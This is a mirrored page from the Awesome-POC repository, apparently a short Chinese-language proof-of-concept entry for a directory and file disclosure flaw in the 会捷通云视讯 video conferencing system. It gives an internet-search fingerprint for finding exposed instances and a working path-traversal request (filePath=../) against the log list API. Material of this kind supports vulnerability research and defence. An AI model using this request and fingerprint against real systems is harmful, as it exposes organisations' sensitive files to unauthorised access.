admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/会捷通云视讯 list 目录文件泄露漏洞.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

41 lines
491 B
Markdown
Raw Blame History

# 会捷通云视讯 list 目录文件泄露漏洞
## 漏洞描述
会捷通云视讯某个文件 list参数 存在目录文件泄露漏洞,攻击者通过漏洞可以获取一些敏感信息
## 漏洞影响
```
会捷通云视讯
```
## 网络测绘
```
body="/him/api/rest/v1.0/node/role"
```
## 漏洞复现
登陆页面如下
![](images/202202101859423.png)
访问Url
```plain
/him/api/rest/V1.0/system/log/list?filePath=../
```
![](images/202202101859690.png)
##
Reference in New Issue View Git Blame Copy Permalink